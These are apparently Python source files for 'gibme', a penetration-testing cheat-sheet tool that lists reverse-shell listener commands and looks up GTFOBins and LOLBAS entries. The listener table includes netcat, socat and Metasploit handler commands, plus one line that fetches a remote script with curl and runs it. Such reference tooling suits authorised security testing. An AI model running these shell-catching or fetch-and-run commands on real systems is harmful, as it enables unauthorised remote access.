    "pdksh",
    "tcsh",
    "mksh",
    "dash",
]

listenerCommands = [
    ["nc", "nc -lvnp {port}"],
    ["nc freebsd", "nc -lvn {port}"],
    ["busybox nc", "busybox nc -lp {port}"],
    ["ncat", "ncat -lvnp {port}"],
    ["ncat.exe", "ncat.exe -lvnp {port}"],
    ["ncat (TLS)", "ncat --ssl -lvnp {port}"],
    ["rlwrap + nc", "rlwrap -cAr nc -lvnp {port}"],
    ["rustcat", "rcat listen {port}"],
    ["pwncat", "python3 -m pwncat -lp {port}"],
    ["windows ConPty", "stty raw -echo; (stty size; cat) | nc -lvnp {port}"],
    ["socat", "socat -d -d TCP-LISTEN:{port} STDOUT"],
    ["socat (TTY)", "socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:{port}"],
    ["powercat", "powercat -l -p {port}"],
    [
        "msfconsole",
        'msfconsole -q -x "use multi/handler; set payload {payload}; set lhost {ip}; set lport {port}; exploit"',
    ],
    [
        "hoaxshell",
        'python3 -c "$(curl -s https://raw.githubusercontent.com/t3l3machus/hoaxshell/main/revshells/hoaxshell-listener.py)" -t {type} -p {port}',
    ],
]



import httpx
import json
import re
import sys

from yaml import load_all, SafeLoader
from bs4 import BeautifulSoup
from pathlib import Path
from rich.table import Table
from rich.console import Console
from rich.text import Text
from rich.panel import Panel


def get_exe():
    """
    Retrieves a dictionary of executable names and their corresponding URLs from the LOLBAS website.

    Returns:
        dict: A dictionary containing executable names as keys and their corresponding URLs as values.
    """
    try:
        URL = "https://lolbas-project.github.io/"
        exe = {}
        with httpx.Client() as client:
            response = client.get(URL)
            soup = BeautifulSoup(response.text, "lxml")
            tds = soup.find_all("a", class_="bin-name")
            for i in tds:
                exe[i.text] = i["href"][8:][:-1]

            return exe

    except Exception as e:
        console = Console()
        console.print(f"[-] Error: {e}", style="red")
        sys.exit(0)


def list_exe(home_dir: Path):
    """
    Lists the executables from the LOLBAS file specified in the settings.

    Args:
        home_dir (Path): The home directory where the settings file is located.

    Returns:
        None
    """
    settings_file = home_dir / "settings.json"
    with open(settings_file, "r") as f:
        settings = json.load(f)
        exe_list_file = settings["lolbas_file"]

    with open(exe_list_file, "r") as f:
        _exe_list(f)


def _exe_list(f):
    """
    Display a table of executable names from a JSON file.

    Args:
        f (file): The JSON file to read from.

    Raises:
        json.JSONDecodeError: If the JSON file is invalid.

    """
    try:
        data = json.load(f)
        exe = list(data["exe"].keys())
        table = Table(
            show_header=False, header_style="bold magenta", title="\nExecutable List"
        )
        for _ in range(5):
            table.add_column(justify="center")

        for i in range(0, len(exe), 5):
            row = exe[i : i + 5]
            row += [""] * (5 - len(row))
            table.add_row(*[Text(x, style="green") for x in row])
        console = Console()
        console.print(table)
    except Exception as e:
        if isinstance(e, json.JSONDecodeError):
            console = Console()
            console.print(
                "[bold red][-] Error: Invalid JSON file - Please run 'gibme -update' to update modules",
            )


def lolbas_info(exe_name: str, home_dir: Path):
    """
    Retrieve information about a LOLBAS (Living Off The Land Binaries and Scripts) executable.

    Args:
        exe_name (str): The name of the LOLBAS executable.
        home_dir (Path): The path to the home directory.

    Raises:
        SystemExit: If the specified executable is not in the list of executables.

    Returns:
        None
    """
    with open(home_dir / "lolbas.json", "r") as f:
        data = json.load(f)
        exe = data["exe"]
        if exe_name not in exe:
            console = Console()
            console.print(
                f"[-] Error: {exe_name} is not in the list of executables. Please run 'gibme -update' to update modules",
                style="bold red",
            )
            sys.exit(0)
        else:
            exe_name = exe[exe_name]
            if "OtherMSBinaries" not in exe_name:
                exe_name = f"OS{exe_name}"

    try:
        with httpx.Client() as client:
            _lolbas_parse_info(client, exe_name)
    except Exception as e:
        console = Console()
        console.print(f"An error occurred: {e}")


def _lolbas_parse_info(client, exe_name):
    """
    Parses LOLBAS information for a given executable.

    Args:
        client (object): The HTTP client used to make the request.
        exe_name (str): The name of the executable.

    Returns:
        None
    """
    raw_url = f"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/yml/{exe_name}.yml"
    response = client.get(raw_url)
    data = list(load_all(response.text, Loader=SafeLoader))[0]

    console = Console()

    console.print(Panel(Text(data["Name"], style="bold blue"), expand=False))

    console.print("\n[bold underline cyan]General Information:[/bold underline cyan]")
    console.print(
        f"  Description: [spring_green3]{data['Description']}[/spring_green3]"
    )
    console.print(f"  Author: [spring_green3]{data['Author']}[/spring_green3]")
    console.print(f"  Created: [spring_green3]{str(data['Created'])}[/spring_green3]")

    for i, command in enumerate(data["Commands"], start=1):
        console.print(f"\n[bold underline cyan]Command {i}:[/bold underline cyan]")
        for key, value in command.items():
            if key in ["Command", "Code", "Path"]:
                console.print(f"  {key}: [bold yellow]{value}[/bold yellow]")
            else:
                value = re.sub(
                    r'"(.*?)"', r"[bold magenta]\1[/bold magenta]", str(value)
                )
                console.print(f"  {key}: [spring_green3]{value}[/spring_green3]")

    for section in [
        "Full_Path",
        "Code_Sample",
        "Detection",
        "Resources",
        "Acknowledgement",
    ]:
        if section in data:
            for i, item in enumerate(data[section], start=1):
                console.print(
                    f"\n[bold underline cyan]{section} {i}:[/bold underline cyan]"
                )
                for key, value in item.items():
                    if key in ["Command", "Code", "Path"]:
                        console.print(f"  {key}: [bold yellow]{value}[/bold yellow]")
                    elif key == "IOC":
                        console.print(f"  {key}: [bold red]{value}[/bold red]")
                    else:
                        value = re.sub(
                            r'"(.*?)"', r"[bold magenta]\1[/bold magenta]", str(value)
                        )
                        console.print(
                            f"  {key}: [spring_green3]{value}[/spring_green3]"
                        )



import json
import re
import sys
import httpx

from pathlib import Path

# from git import Repo, Blob
from .gtfobins import get_bins
from .lolbas import get_exe
from .cve import CVE
from rich.console import Console
from rich.prompt import Prompt
from .shell_data import reverse_shell, bind_shell, hoax_shell, msfvenom
from .cheatsheet import download_default_notes, walk_directory
from rapidfuzz import process, fuzz, utils as fuzz_utils


def check_init():
    """
    Check if the gibme directory and settings file exist.
    If not, initialize them.

    Returns:
        Path: The path to the gibme directory.
    """
    home_dir = Path.home()
    gibnme_dir = home_dir / ".gibme"
    settings_file = home_dir / ".gibme/settings.json"

    if not gibnme_dir.exists():
        initialize_settings()

    if not settings_file.exists():
        initialize_settings()

    return gibnme_dir


def initialize_settings():
    """
    Initializes the settings for the gibme application.

    This function creates the necessary directories and files for the application's settings,
    and initializes them with default values if they don't already exist.

    Returns:
        None
    """
    print("Initializing settings...")
    home_dir = Path.home()
    gibnme_dir = home_dir / ".gibme"
    if not gibnme_dir.exists():
        gibnme_dir.mkdir()

    gtfobins_file = gibnme_dir / "gtfobins.json"
    if not gtfobins_file.exists():
        gtfobins_file.touch()
        update_gtfo(gtfobins_file)

    lolbas_file = gibnme_dir / "lolbas.json"
    if not lolbas_file.exists():
        lolbas_file.touch()
        update_lolbas(lolbas_file)

    note_dir = gibnme_dir / "default_notes"
    if not note_dir.exists():
        note_dir.mkdir()
        update_notes(note_dir)

    cve_poc_file = gibnme_dir / "cve_poc.json"
    if not cve_poc_file.exists():
        cve_poc_file.touch()
        update_cve_poc(cve_poc_file)

    tldr_tags = gibnme_dir / "tags.json"
    if not tldr_tags.exists():
        tldr_tags.touch()
        update_tlrd_tags(tldr_tags)

    settings_file = gibnme_dir / "settings.json"
    if not settings_file.exists():
        settings_file.touch()
        with open(settings_file, "w") as f:
            data = {
                "gtfobins_file": str(gtfobins_file),
                "lolbas_file": str(lolbas_file),
                "cve_poc_file": str(cve_poc_file),
                "default_notes_dir": str(note_dir),
                "custom_notes_dir": "None",
            }
            json.dump(data, f)

    print("Settings initialized successfully")


def update_notes(note_dir: Path):
    """
    Updates the notes directory by creating it if it doesn't exist and downloading default notes.

    Args:
        note_dir (Path): The path to the notes directory.

    Returns:
        None
    """
    if not note_dir.exists():
        note_dir.mkdir()

    download_default_notes(note_dir)


def update_lolbas(lolbas_json_file: Path):
    """
    Update the LOLBAS JSON file with the chosen executable.

    If the LOLBAS JSON file doesn't exist, initialize the settings.
    Get the chosen executable and store it in the JSON file.

    Args:
        lolbas_json_file (Path): The path to the LOLBAS JSON file.

    Returns:
        None
    """
    if not lolbas_json_file.exists():
        initialize_settings()

    lolbas_choice = get_exe()
    data = {"exe": lolbas_choice}

    with lolbas_json_file.open("w") as f:
        json.dump(data, f)


def update_gtfo(gtfo_json_file: Path):
    """
    Update the GTFO JSON file with the chosen bins.

    If the GTFO JSON file does not exist, initialize the settings.
    Get the chosen bins and save them to the JSON file.

    Args:
        gtfo_json_file (Path): The path to the GTFO JSON file.

    Returns:
        None
    """
    if not gtfo_json_file.exists():
        initialize_settings()

    gtfo_choice = get_bins()
    data = {"bins": gtfo_choice}

    with gtfo_json_file.open("w") as f:
        json.dump(data, f)


def update_gibme():
    """
    Updates the GTFOBins, LOLBAS, and default notes for Gibme.

    This function reads the settings from the settings.json file located in the .gibme directory
    in the user's home directory. It then updates the GTFOBins, LOLBAS, and default notes based
    on the file paths specified in the settings.

    After each update, a success message is printed to the console.

    Note: This function assumes that the necessary update functions (update_gtfo, update_lolbas,
    and update_notes) are defined elsewhere in the code.

    Example usage:
    >>> update_gibme()
    [bold cyan]Updating GTFOBins...[/bold cyan]
    [bold green]GTFOBins updated successfully![/bold green]
    [bold cyan]Updating LOLBAS...[/bold cyan]
    [bold green]LOLBAS updated successfully![/bold green]
    [bold cyan]Updating default notes...[/bold cyan]
    [bold green]Default notes updated successfully![/bold green]
    [bold green]Gibme updated successfully![/bold green]
    """
    console = Console()
    home_dir = Path.home()
    gibnme_dir = home_dir / ".gibme"
    settings_file = gibnme_dir / "settings.json"
    with open(settings_file, "r") as f:
        settings = json.load(f)
        gtfobins_file = settings["gtfobins_file"]
        lolbas_file = settings["lolbas_file"]

    console.print("[bold cyan]Updating GTFOBins...[/bold cyan]")
    update_gtfo(Path(gtfobins_file))
    console.print("[bold green]GTFOBins updated successfully![/bold green]")

    console.print("[bold cyan]Updating LOLBAS...[/bold cyan]")
    update_lolbas(Path(lolbas_file))
    console.print("[bold green]LOLBAS updated successfully![/bold green]")

    console.print("[bold cyan]Updating default notes...[/bold cyan]")
    update_notes(Path(settings["default_notes_dir"]))
    console.print("[bold green]Default notes updated successfully![/bold green]")

    console.print("[bold cyan]Updating tldr tags...[/bold cyan]")
    update_tlrd_tags(Path(gibnme_dir / "tags.json"))
    console.print("[bold green]tldr tags updated successfully![/bold green]")
    
    console.print("[bold green]Gibme updated successfully![/bold green]")


def update_tlrd_tags(tldr_tags: Path):
    if not tldr_tags.exists():
        initialize_settings()
    with httpx.Client() as client:
        url = "https://raw.githubusercontent.com/foreztgump/gibme/main/static/tags.json"
        response = client.get(url)
        if response.status_code == 200:
            with open(tldr_tags, "w") as f:
                f.write(response.text)
        else:
            console = Console()
            console.print(
                "\n[bold red]Error: tldr tags is not found. Check your connection or try again later."
            )

def update_cve_poc(cve_poc_file: Path):
    if not cve_poc_file.exists():
        initialize_settings()

    cve_poc = CVE()
    data = cve_poc.get_cve_poc()


## TODO Rewrite and Refractor this function
def fuzz_name(
    name: str, type_str: str, home_dir: Path = None, choice_path: Path = None
) -> list:
    """
    Fuzzes the given name based on the specified type and returns a list of fuzzed results.

    Args:
        name (str): The name to be fuzzed.
        type_str (str): The type of fuzzing to be performed.
        home_dir (Path, optional): The home directory path. Defaults to None.
        choice_path (Path, optional): The path to the choice file. Defaults to None.

    Returns:
        list: A list of fuzzed results.
    """
    if home_dir != None:
        if choice_path == "default":
            settings_file = home_dir / "settings.json"
            with open(settings_file, "r") as settings_file:
                return _get_notes_fuzz(settings_file, "default_notes_dir", name)[0]
        elif choice_path == "custom":
            settings_file = home_dir / "settings.json"
            with open(settings_file, "r") as settings_file:
                return _get_notes_fuzz(settings_file, "custom_notes_dir", name)[0]
        else:
            choice_path = home_dir / f"{type_str}.json"

            with open(choice_path, "r") as f:
                if type_str == "gtfobins":
                    data = json.load(f)
                    choice = data["bins"]
                    return _fuzz_result(name, choice, "ratio")

                elif type_str == "lolbas":
                    data = json.load(f)
                    choice = list(data["exe"].keys())
                    return _fuzz_result(name, choice, "ratio")

    elif type_str == "reverse":
        rs_shell_choice = [shell["name"] for shell in reverse_shell]
        if re.fullmatch("py", name):
            name = name.replace("py", "python")

        if re.fullmatch("ps", name):
            name = name.replace("ps", "powershell")

        return _fuzz_result(name, rs_shell_choice, "token")

    elif type_str == "bind":
        if re.fullmatch("py", name):
            name = name.replace("py", "python3")

        if re.fullmatch("python", name):
            name = name.replace("python", "python3")

        rs_shell_choice = [shell["name"] for shell in bind_shell]
        return _fuzz_result(name, rs_shell_choice, "token")

    elif type_str == "hoax":
        if re.search("ps", name):
            name = name.replace("ps", "PowerShell")

        rs_shell_choice = [shell["name"] for shell in hoax_shell]
        return _fuzz_result(name, rs_shell_choice, "token")

    elif type_str == "msfvenom":
        rs_shell_choice = [shell["name"] for shell in msfvenom]
        return _fuzz_result(name, rs_shell_choice, "token")


def _get_notes_fuzz(settings_file, directory_mode: str, name: str):
    """
    Retrieves fuzzy search results for a given name from the specified directory. Specifically used for notes.

    Args:
        settings_file (file): The settings file containing the directory information.
        directory_mode (str): The mode specifying the type of directory to search in. 'default_notes_dir' or 'custom_notes_dir'.
        name (str): The name to search for.

    Returns:
        list: The fuzzy search results for the given name.
    """
    settings = json.load(settings_file)
    default_note_dir = Path(settings[directory_mode])
    choice_data = walk_directory(default_note_dir)
    choice = []
    for folder, files in choice_data.items():
        choice.append(folder)
        choice.extend(iter(files))
    # if len(_fuzz_result(name, choice, "token")) > 1:
    #     return _user_select(_fuzz_result(name, choice, "token"))
    # else:
    return _fuzz_result(name, choice, "token")


def _fuzz_result(name: str, choice: list, fuzz_type: str) -> list:
    """
    Perform fuzzy matching on the given name against the choices using the specified fuzz type.

    Args:
        name (str): The name to be matched.
        choice (list): The list of choices to match against.
        fuzz_type (str): The type of fuzzy matching to perform. Valid values are "ratio" and "token".

    Returns:
        list: A list of matches with their similarity scores.

    Raises:
        None
    """
    if fuzz_type == "ratio":
        fuzz_similarity = process.extract(
            name,
            choice,
            scorer=fuzz.ratio,
            limit=10,
            score_cutoff=30,
            processor=fuzz_utils.default_process,
        )
        highest_similarity = max(fuzz_similarity, key=lambda x: x[1])

        if highest_similarity[1] > 90:
            return [highest_similarity]

        console = Console()
        console.print("Did you mean one of these?", style="yellow")

        # for name, similarity, index in fuzz_similarity:
        #     console.print(f"{name}:", style="green", end=" ")
        #     console.print(f"{format(similarity, '.1f')}% similarity", style="cyan")
        # sys.exit(0)
        return _user_select(fuzz_similarity)

    elif fuzz_type == "token":
        fuzz_similarity = process.extract(
            name,
            choice,
            scorer=fuzz.token_set_ratio,
            limit=10,
            score_cutoff=10,
            processor=fuzz_utils.default_process,
        )

        if high_score_matches := [
            match for match in fuzz_similarity if match[1] >= 70.0
        ]:
            return high_score_matches
        return _user_select(fuzz_similarity)


def _user_select(choice_list: list) -> list:
    """
    Prompt the user to select an option from a list.

    Args:
        choice_list (list): A list of options to choose from.

    Returns:
        list: A list containing the selected option.
    """
    console = Console()
    if len(choice_list) <= 1:
        return [choice_list[0]]  # Return a list containing the single element
    options = {str(i): f"{i}. {n[0]}" for i, n in enumerate(choice_list, start=1)}
    console.print("[bold cyan]Please choose one of the following options:")
    for option in options.values():
        console.print(f"[bold green]{option}")
    selected = Prompt.ask("Your choice:", choices=options.keys())
    return [
        choice_list[int(selected) - 1]
    ]  # Return a list containing the selected element



from textual.screen import Screen
from textual.app import ComposeResult
from textual.widgets import Markdown, Header, Footer

class About(Screen):
    BINDINGS = [("escape,space,q,question_mark", "pop_screen", "Close")]

    ABOUT_MARKDOWN = """\
# About Gibme

Gibme is a tool developed by [foreztgump (https://github.com/foreztgump)](https://github.com/foreztgump).

## Version

The current version of Gibme is 0.7.13

## Project Page

For more information about Gibme, visit the [project page (https://github.com/foreztgump/gibme)](https://github.com/foreztgump/gibme).
"""

    def compose(self) -> ComposeResult:
        yield Header()
        yield Footer()
        yield Markdown(self.ABOUT_MARKDOWN)

    async def on_mount(self) -> None:
        """Called when app starts."""
        self.title = "Gibme"
        self.sub_title = "Help"


import httpx
import json
import sys

from yaml import load_all, SafeLoader
from bs4 import BeautifulSoup
from pathlib import Path
from rich.table import Table
from rich.console import Console
from rich.text import Text


def get_bins():
    """
    Retrieves a list of binary names from the gtfobins website.

    Returns:
        list: A list of binary names.
    """
    try:
        url = "https://gtfobins.github.io/"
        with httpx.Client() as client:
            response = client.get(url)
            soup = BeautifulSoup(response.text, "lxml")
            tds = soup.find_all("a", class_="bin-name")
            return [i.text for i in tds]

    except Exception as e:
        console = Console()
        console.print(f"[-] Error: {e}", style="bold red")
        sys.exit(0)


def list_bins(home_dir: Path):
    """
    Lists the bins from the gtfobins file specified in the settings.

    Args:
        home_dir (Path): The home directory path.

    Returns:
        None
    """
    settings_file = home_dir / "settings.json"
    with open(settings_file, "r") as f:
        settings = json.load(f)
        bin_list_file = settings["gtfobins_file"]

    with open(bin_list_file, "r") as f:
        _bins_list(f)


def _bins_list(f):
    """
    Display a table of binaries from a JSON file.

    Args:
        f (file): The JSON file containing the binary data.

    Raises:
        json.JSONDecodeError: If the JSON file is invalid.

    """
    try:
        data = json.load(f)
        bins = data["bins"]
        table = Table(
            show_header=False, header_style="bold magenta", title="\nBinaries List"
        )
        for _ in range(7):
            table.add_column(justify="center")

        for i in range(0, len(bins), 8):
            row = bins[i : i + 8]
            row += [""] * (8 - len(row))
            table.add_row(*[Text(x, style="green") for x in row])
        console = Console()
        console.print(table)
    except Exception as e:
        if isinstance(e, json.JSONDecodeError):
            console = Console()
            console.print(
                "[-] Error: Invalid JSON file - Please run 'gibme -update' to update modules",
                style="bold red",
            )


def gtfobins_info(bin_name: str):
    """
    Retrieves information about a specific binary from the GTFOBins website.

    Args:
        bin_name (str): The name of the binary to retrieve information for.

    Raises:
        Exception: If an error occurs during the retrieval process.

    Returns:
        None
    """
    bin_name = bin_name.lower()

    try:
        with httpx.Client() as client:
            _gtfobins_parse_info(client, bin_name)
    except Exception as e:
        print(f"An error occurred: {e}")


def _gtfobins_parse_info(client, bin_name):
    """
    Parse information about a specific GTFOBin.

    Args:
        client (object): The HTTP client used to make the request.
        bin_name (str): The name of the GTFOBin.

    Returns:
        None
    """
    raw_url = f"https://raw.githubusercontent.com/GTFOBins/GTFOBins.github.io/master/_gtfobins/{bin_name}.md"
    response = client.get(raw_url)
    data = list(load_all(response.text, Loader=SafeLoader))[0]

    console = Console()
    for function, codes in data["functions"].items():
        console.print(f"[white]Type:[/white] [red]\t\t{function}[/red]")

        for code in codes:
            if description := code.get("description", None):
                console.print(
                    f"[white]Description:[/white] [yellow]\t{description}[/yellow]"
                )

            code_lines = code["code"].split("\n")
            formatted_code = "\n".join("\t\t" + line for line in code_lines)
            console.print(f"[white]Code:[/white] [green]{formatted_code}[/green]")



import httpx
from textual import work
from textual.app import ComposeResult
from textual.screen import Screen
from textual.widgets import Markdown, Input, Header, Footer
from textual.containers import VerticalScroll
from yaml import load_all, SafeLoader
from bs4 import BeautifulSoup
from rapidfuzz import process, fuzz, utils as fuzz_utils

class GTFO(Screen):

    BINDINGS = [("escape", "pop_screen", "Close")]

    def compose(self) -> ComposeResult:
        yield Header()
        yield Footer()
        yield Input(placeholder="Search for GTFO Bins")
        with VerticalScroll(id="results-container"):
            yield Markdown(id="results")

    async def on_mount(self) -> None:
        """Called when app starts."""
        self.query_one(Input).focus()
        self.title = "Gibme"
        self.sub_title = "GTFO Bins"
        self.bins_list = await self.get_bins()

    async def on_input_changed(self, message: Input.Changed) -> None:
        """A coroutine to handle a text changed message."""
        if message.value:
            # self.gtfobins_info(message.value)
            fuzz_result = await self.fuzz_bin(message.value)
            if len(fuzz_result) == 0:
                self.query_one("#results", Markdown).update(f"**Not Found**")
            elif len(fuzz_result) == 1 and len(fuzz_result[0]) == 1:
                self.gtfobins_info(fuzz_result[0][0])
            else:
                self.query_one("#results", Markdown).update(self.fuzz_result_markdown(fuzz_result))
        else:
            # Clear the results
            self.query_one("#results", Markdown).update("")

    @work(exclusive=True)
    async def gtfobins_info(self, bin_name: str) -> None:
        bin_name = bin_name.lower()
        raw_url = f"https://raw.githubusercontent.com/GTFOBins/GTFOBins.github.io/master/_gtfobins/{bin_name}.md"

        async with httpx.AsyncClient() as client:
            try:
                response = await client.get(raw_url)

            except Exception:
                self.query_one("#results", Markdown).update(response.text)

        if bin_name == self.query_one(Input).value:
            markdown = self.make_word_markdown(response, bin_name)
            self.query_one("#results", Markdown).update(markdown)

    def make_word_markdown(self, response: httpx.Response, bin_name: str) -> str:
        """Make a markdown string for a word."""
        if response.status_code == 404:
            return "### Not Found"

        data = list(load_all(response.text, Loader=SafeLoader))[0]
        markdown = f"# **{bin_name}**\n\n"
        for function, details in data["functions"].items():
            markdown += f"- **{function}**\n\n"
            for detail in details:
                if "description" in detail:
                    formatted_description = detail["description"]
                    markdown += f"**Description:** *{formatted_description}*\n\n"
                if "code" in detail:
                    formatted_code = detail["code"].split('\n')
                    markdown += "```\n"
                    for line in formatted_code:
                        markdown += f"{line}\n"
                    markdown += "```\n\n"
            markdown += "\n---\n\n"
        return markdown
    
    async def get_bins(self):
        URL = "https://gtfobins.github.io/"
        async with httpx.AsyncClient() as client:
            try:
                response = await client.get(URL)
                soup = BeautifulSoup(response.text, "lxml")
                tds = soup.find_all("a", class_="bin-name")
                return [i.text for i in tds]

            except Exception as e:
                self.query_one("#results", Markdown).update(f"**Check your internet connection - Error: {e}**")

    async def fuzz_bin(self, bin_name: str) -> list:
        choices = list(self.bins_list)
        bin_name = bin_name.lower()
        results = process.extract(
                bin_name, 
                choices, 
                scorer=fuzz.ratio,
                limit=10,
                score_cutoff=70,
                processor=fuzz_utils.default_process,)
        if results:
            highest_similarity = max(results, key=lambda x: x[1])
            if highest_similarity[1] > 90:
                return [(highest_similarity[0],)]
            else:
                return results
        else:
            return results
            
    def fuzz_result_markdown(self, results: list) -> str:
        markdown = ""
        for result in results:
            markdown += f"**{result[0]}**\n\n"
        return markdown